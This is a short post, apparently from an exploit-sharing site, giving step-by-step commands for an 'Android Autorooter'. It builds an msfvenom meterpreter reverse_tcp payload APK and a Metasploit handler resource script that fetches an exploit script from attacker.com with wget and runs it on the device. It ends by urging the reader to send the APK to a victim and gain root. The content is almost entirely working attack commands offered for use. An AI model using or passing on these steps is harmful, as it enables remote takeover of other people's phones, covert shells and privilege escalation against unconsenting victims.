## https://sploitus.com/exploit?id=5C855871-83A4-5907-9094-D548A3545C40
# Android Autorooter
This is just a mental note more than anything to further explore the posibilities of the work done here:
Ultimately I'd like to have a self executing exploit but babysteps yeah..
## Give this a try
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk
Create a resource script execute_script.rc to automate the commands:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit -j
set AutoRunScript multi_console_command -rc /path/to/commands.rc
Create the resource script with the necessary commands:
cd /data/local/tmp
wget http://attacker.com/exploit.sh -O exploit.sh
chmod +x exploit.sh
Start Metasploit with the resource script:
msfconsole -r execute_script.rc
Get the party started with:
msfconsole -r execute_script.rc
Now your listener/payload delivery is set up... Send that payload.apk to the victim.. Lets get some root baby